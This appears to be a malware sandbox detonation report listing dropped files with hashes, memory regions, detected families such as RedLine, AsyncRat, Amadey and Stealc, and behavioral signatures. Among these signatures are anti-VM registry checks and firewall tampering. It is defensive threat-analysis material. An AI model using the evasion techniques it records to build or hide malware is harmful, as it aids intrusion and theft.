memory/2412-95-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/1496-96-0x0000000000840000-0x0000000000E37000-memory.dmp

memory/3536-97-0x00000000005B0000-0x0000000000A58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

MD5 c09ff1273b09cb1f9c7698ed147bf22e
SHA1 5634aec5671c4fd565694aa12cd3bf11758675d2
SHA256 bf8ce6bb537881386facfe6c1f9003812b985cbc4b9e9addd39e102449868d92
SHA512 e8f19b432dc3be9a6138d6a2f79521599087466d1c55a49d73600c876508ab307a6e65694e0effb5b705fdecdd0e201f588c8d5c3767fe9ae0b8581c318cadac

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\stub.exe

MD5 972d9d2422f1a71bed840709024302f8
SHA1 e52170710e3c413ae3cfa45fcdecf19db4aa382c
SHA256 1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564
SHA512 3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\python310.dll

MD5 c80b5cb43e5fe7948c3562c1fff1254e
SHA1 f73cb1fb9445c96ecd56b984a1822e502e71ab9d
SHA256 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20
SHA512 faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\vcruntime140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_ctypes.pyd

MD5 87596db63925dbfe4d5f0f36394d7ab0
SHA1 ad1dd48bbc078fe0a2354c28cb33f92a7e64907e
SHA256 92d7954d9099762d81c1ae2836c11b6ba58c1883fde8eeefe387cc93f2f6afb4
SHA512 e6d63e6fe1c3bd79f1e39cb09b6f56589f0ee80fd4f4638002fe026752bfa65457982adbef13150fa2f36e68771262d9378971023e07a75d710026ed37e83d7b

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\sqlite3.dll

MD5 926dc90bd9faf4efe1700564aa2a1700
SHA1 763e5af4be07444395c2ab11550c70ee59284e6d
SHA256 50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0
SHA512 a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_sqlite3.pyd

MD5 7f61eacbbba2ecf6bf4acf498fa52ce1
SHA1 3174913f971d031929c310b5e51872597d613606
SHA256 85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e
SHA512 a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_lzma.pyd

MD5 b5fbc034ad7c70a2ad1eb34d08b36cf8
SHA1 4efe3f21be36095673d949cceac928e11522b29c
SHA256 80a6ebe46f43ffa93bbdbfc83e67d6f44a44055de1439b06e4dd2983cb243df6
SHA512 e7185da748502b645030c96d3345d75814ba5fd95a997c2d1c923d981c44d5b90db64faf77ddbbdc805769af1bec37daf0ecee0930a248b67a1c2d92b59c250c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\cryptography\hazmat\bindings\_rust.pyd

MD5 b364cecdba4b73c71116781b1c38d40f
SHA1 59ef6f46bd3f2ec17e78df8ee426d4648836255a
SHA256 10d009a3c97bf908961a19b4aaddc298d32959acc64bedf9d2a7f24c0261605b
SHA512 999c2da8e046c9f4103385c7d7dbb3bfdac883b6292dca9d67b36830b593f55ac14d6091eb15a41416c0bd65ac3d4a4a2b84f50d13906d36ed5574b275773ce7

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\python3.dll

MD5 07bd9f1e651ad2409fd0b7d706be6071
SHA1 dfeb2221527474a681d6d8b16a5c378847c59d33
SHA256 5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5
SHA512 def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\select.pyd

MD5 adc412384b7e1254d11e62e451def8e9
SHA1 04e6dff4a65234406b9bc9d9f2dcfe8e30481829
SHA256 68b80009ab656ffe811d680585fac3d4f9c1b45f29d48c67ea2b3580ec4d86a1
SHA512 f250f1236882668b2686bd42e1c334c60da7abec3a208ebebdee84a74d7c4c6b1bc79eed7241bc7012e4ef70a6651a32aa00e32a83f402475b479633581e0b07

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\libcrypto-1_1.dll

MD5 ab01c808bed8164133e5279595437d3d
SHA1 0f512756a8db22576ec2e20cf0cafec7786fb12b
SHA256 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55
SHA512 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_asyncio.pyd

MD5 6eb3c9fc8c216cea8981b12fd41fbdcd
SHA1 5f3787051f20514bb9e34f9d537d78c06e7a43e6
SHA256 3b0661ef2264d6566368b677c732ba062ac4688ef40c22476992a0f9536b0010
SHA512 2027707824d0948673443dd54b4f45bc44680c05c3c4a193c7c1803a1030124ad6c8fbe685cc7aaf15668d90c4cd9bfb93de51ea8db4af5abe742c1ef2dcd08b

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

MD5 49ce7a28e1c0eb65a9a583a6ba44fa3b
SHA1 dcfbee380e7d6c88128a807f381a831b6a752f10
SHA256 1be5cfd06a782b2ae8e4629d9d035cbc487074e8f63b9773c85e317be29c0430
SHA512 cf1f96d6d61ecb2997bb541e9eda7082ef4a445d3dd411ce6fd71b0dfe672f4dfaddf36ae0fb7d5f6d1345fbd90c19961a8f35328332cdaa232f322c0bf9a1f9

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\yarl\_quoting_c.pyd

MD5 8b4cd87707f15f838b5db8ed5b5021d2
SHA1 bbc05580a181e1c03e0a53760c1559dc99b746fe
SHA256 eefb46501ef97baf29a93304f58674e70f5ccecafb183f230e5ce7872a852f56
SHA512 6768cff12fa22fe8540a3f6bdb350a5fcec0b2a0f01531458eb23f77b24460620cd400078fd1ec63738884c2b78920e428126833953c26b8dc8ad8b7c069415d

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\unicodedata.pyd

MD5 102bbbb1f33ce7c007aac08fe0a1a97e
SHA1 9a8601bea3e7d4c2fa6394611611cda4fc76e219
SHA256 2cf6c5dea30bb0584991b2065c052c22d258b6e15384447dcea193fdcac5f758
SHA512 a07731f314e73f7a9ea73576a89ccb8a0e55e53f9b5b82f53121b97b1814d905b17a2da9bd2eda9f9354fc3f15e3dea7a613d7c9bc98c36bba653743b24dfc32

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\multidict\_multidict.pyd

MD5 ddd4c0ae1e0d166c22449e9dcdca20d7
SHA1 ff0e3d889b4e8bc43b0f13aa1154776b0df95700
SHA256 74ec52418c5d38a63add94228c6f68cf49519666ae8bcb7ac199f7d539d8612c
SHA512 c8464a77ba8b504ba9c7873f76499174095393c42dc85a9c1be2875c3661cda928851e37013e4ac95ba539eed984bf71c0fcc2cb599f3f0c4c1588d4a692bdfd

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_overlapped.pyd

MD5 7e6bd435c918e7c34336c7434404eedf
SHA1 f3a749ad1d7513ec41066ab143f97fa4d07559e1
SHA256 0606a0c5c4ab46c4a25ded5a2772e672016cac574503681841800f9059af21c4
SHA512 c8bf4b1ec6c8fa09c299a8418ee38cdccb04afa3a3c2e6d92625dbc2de41f81dd0df200fd37fcc41909c2851ac5ca936af632307115b9ac31ec020d9ed63f157

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\aiohttp\_helpers.pyd

MD5 d2bf6ca0df56379f1401efe347229dd2
SHA1 95c6a524a9b64ec112c32475f06a0821ff7e79c9
SHA256 04d56d6aa727665802283b8adf9b873c1dd76dfc7265a12c0f627528ba706040
SHA512 b4a2b9f71b156731aa071d13bf8dcffec4091d8d2fab47aea1ff47cd7abff13e28acf1d9456a97eb7a5723dbfa166fc63de11c63dc5cb63b13b4df9930390377

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\aiohttp\_http_parser.pyd

MD5 9642c0a5fb72dfe2921df28e31faa219
SHA1 67a963157ee7fc0c30d3807e8635a57750ca0862
SHA256 580a004e93bed99820b1584dffaf0c4caa9fbbf4852ccded3b2b99975299367b
SHA512 f84b7cde87186665a700c3017efcbcc6c19f5dc2c7b426d427dddbcbdec38b6189dd60ce03153fb14b6ea938d65aab99da33bda63b48e3e9ce9e5d3555b50a04

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\aiohttp\_http_writer.pyd

MD5 e16a71fc322a3a718aeaeaef0eeeab76
SHA1 78872d54d016590df87208518e3e6515afce5f41
SHA256 51490359d8079232565187223517eca99e1ce55bc97b93cf966d2a5c1f2e5435
SHA512 a9a7877aa77d000ba2dd7d96cf88a0e9afb6f6decb9530c1d4e840c270dd1805e73401266b1c8e17c1418effb823c1bd91b13f82dbfc6dba455940e3e644de54

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\libssl-1_1.dll

MD5 de72697933d7673279fb85fd48d1a4dd
SHA1 085fd4c6fb6d89ffcc9b2741947b74f0766fc383
SHA256 ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f
SHA512 0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gz0yysgf.3bd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4956-243-0x000001E399960000-0x000001E399982000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_ssl.pyd

MD5 35f66ad429cd636bcad858238c596828
SHA1 ad4534a266f77a9cdce7b97818531ce20364cb65
SHA256 58b772b53bfe898513c0eb264ae4fa47ed3d8f256bc8f70202356d20f9ecb6dc
SHA512 1cca8e6c3a21a8b05cc7518bd62c4e3f57937910f2a310e00f13f60f6a94728ef2004a2f4a3d133755139c3a45b252e6db76987b6b78bc8269a21ad5890356ad

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_socket.pyd

MD5 e137df498c120d6ac64ea1281bcab600
SHA1 b515e09868e9023d43991a05c113b2b662183cfe
SHA256 8046bf64e463d5aa38d13525891156131cf997c2e6cdf47527bc352f00f5c90a
SHA512 cc2772d282b81873aa7c5cba5939d232cceb6be0908b211edb18c25a17cbdb5072f102c0d6b7bc9b6b2f1f787b56ab1bc9be731bb9e98885c17e26a09c2beb90

C:\Users\Admin\AppData\Local\Temp\onefile_5048_133616680942450414\_cffi_backend.pyd

MD5 ebb660902937073ec9695ce08900b13d
SHA1 881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA256 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA512 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 a4b636201605067b676cc43784ae5570
SHA1 e9f49d0fc75f25743d04ce23c496eb5f89e72a9a
SHA256 f178e29921c04fb68cc08b1e5d1181e5df8ce1de38a968778e27990f4a69973c
SHA512 02096bc36c7a9ecfa1712fe738b5ef8b78c6964e0e363136166657c153727b870a6a44c1e1ec9b81289d1aa0af9c85f1a37b95b667103edc2d3916280b6a9488

memory/2412-257-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/1496-258-0x0000000000840000-0x0000000000E37000-memory.dmp

memory/3536-267-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3644-269-0x00007FF65B4E0000-0x00007FF65C715000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

memory/4912-300-0x0000000002570000-0x00000000025A6000-memory.dmp

memory/4912-301-0x0000000004D50000-0x0000000005378000-memory.dmp

memory/4912-304-0x0000000005530000-0x0000000005596000-memory.dmp

memory/4912-303-0x0000000004CB0000-0x0000000004D16000-memory.dmp

memory/4912-302-0x0000000004B90000-0x0000000004BB2000-memory.dmp

memory/4912-314-0x00000000055A0000-0x00000000058F4000-memory.dmp

memory/4912-315-0x0000000005B30000-0x0000000005B4E000-memory.dmp

memory/4912-316-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

memory/5048-317-0x00007FF649790000-0x00007FF64A265000-memory.dmp

memory/4912-318-0x0000000007380000-0x00000000079FA000-memory.dmp

memory/4912-319-0x0000000006050000-0x000000000606A000-memory.dmp

memory/5048-320-0x00007FF649790000-0x00007FF64A265000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b2a1398f937474c51a48b347387ee36a
SHA1 922a8567f09e68a04233e84e5919043034635949
SHA256 2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6
SHA512 4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

MD5 e817cc929fbc651c5bdab9e8cca0d9d9
SHA1 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f
SHA256 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282
SHA512 a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

memory/708-353-0x00000000006B0000-0x00000000008F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1ac52e2503cc26baee4322f02f5b8d9c
SHA1 38e0cee911f5f2a24888a64780ffdf6fa72207c8
SHA256 f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4
SHA512 7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

memory/708-365-0x0000000006600000-0x000000000681E000-memory.dmp

memory/708-359-0x00000000052B0000-0x00000000054CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3778f5e54565bbe9abc42dce76cbe2f6
SHA1 ded83f1b2b0187a718611e45b46a27f58a27ce11
SHA256 036af4ec5f33e6649074f28541fefb6b85cd01e303995765d00f08f4bcd319ec
SHA512 c4a4200d58d3f730c8e17e6c0a6bf8ff902cb4f4ec7c6557fb7114aefb96c07567cba13b036831799764ea139ec80df264d0e34b3fd0d00a9e570fb6afd984d7

memory/708-366-0x0000000006DD0000-0x0000000007374000-memory.dmp

memory/708-367-0x0000000006920000-0x00000000069B2000-memory.dmp

memory/708-381-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-385-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-396-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-407-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-404-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-401-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-399-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-393-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-405-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-391-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-389-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-398-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-383-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-387-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-380-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-375-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-372-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-368-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-377-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-373-0x0000000006600000-0x0000000006818000-memory.dmp

memory/708-370-0x0000000006600000-0x0000000006818000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 80d2f84ce53d22f983d082b8a7474ed0
SHA1 0d40e6f2cfd40a6b44600dffe956af979777e872
SHA256 dbb21de051ba6af9649ba726b7ca012843a51964cf4c735768c0131f29f147d4
SHA512 8d81de32252b7b503726646307b6fa2fe0e77d048d1bc8b2b02859a217d0aa3befe7f56ed748ea0e622a7f0a16dc5c514550e766b39cb652adcf950d483eab64

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b545cfe392ebb47b919b44160e57e062
SHA1 6095cb373488e228b8508e449aeb63b0179d45d0
SHA256 20917efe500abc3aac50afe5be1968f9f2f03736ea4f587dc43436fae4e5d473
SHA512 52a082259c34dc7aae7ef67c075d37d1c1cfb5669e373a4e1db543cec125a0b61b12dbded5311bbc23e6d87d8db81435dbc353009a05df3146d7997f81040d4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/708-5329-0x0000000006AA0000-0x0000000006AEC000-memory.dmp

memory/708-5328-0x0000000006A40000-0x0000000006A98000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 e19edf928c2ba3559a6d530203ce91db
SHA1 2422e3e766c48b91a54b8c185203bf0a79f65614
SHA256 cbd004bd090e0758a4e0fb8a876d53348b1b4cbcf0ed78b526f55a3835b2359b
SHA512 c5e47f57c72d70fdc32bd8b376153fee78068fdd40bb74939c2458182e8e2058282745b58ca2807640706f792cce20245c04f870f1cab506c37d35516971f994

memory/3964-5366-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/1572-5367-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/1572-5369-0x00000000005B0000-0x0000000000A58000-memory.dmp

memory/3964-5371-0x0000000000C80000-0x0000000001153000-memory.dmp

memory/708-5387-0x0000000006C40000-0x0000000006C94000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f5eafc92b2c2c85caf2ead6667131302
SHA1 d5d7c4fb68feab8f6efb7539821353cc038525c0
SHA256 564a788b7259baa3827bfc444468c03c30e967a515c55d78a300c344d8f7c24b
SHA512 f6af62924b293fa485ad1e304a6762bd98e7ff5f29a14f1b6059149db0b9ad4093384fd4c21e5fa7ff7e21c2e198dd806d28da86cd49e4483044e15abc1ab308

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 22:27

Reported

2024-05-31 22:29

Platform

win11-20240508-en

Max time kernel

140s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Exela Stealer

stealer exelastealer

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2612 created 3304 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif C:\Windows\Explorer.EXE
PID 2612 created 3304 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif C:\Windows\Explorer.EXE

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\7ec52fcc46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe N/A
N/A N/A C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe N/A
N/A N/A C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe N/A
N/A N/A C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe N/A
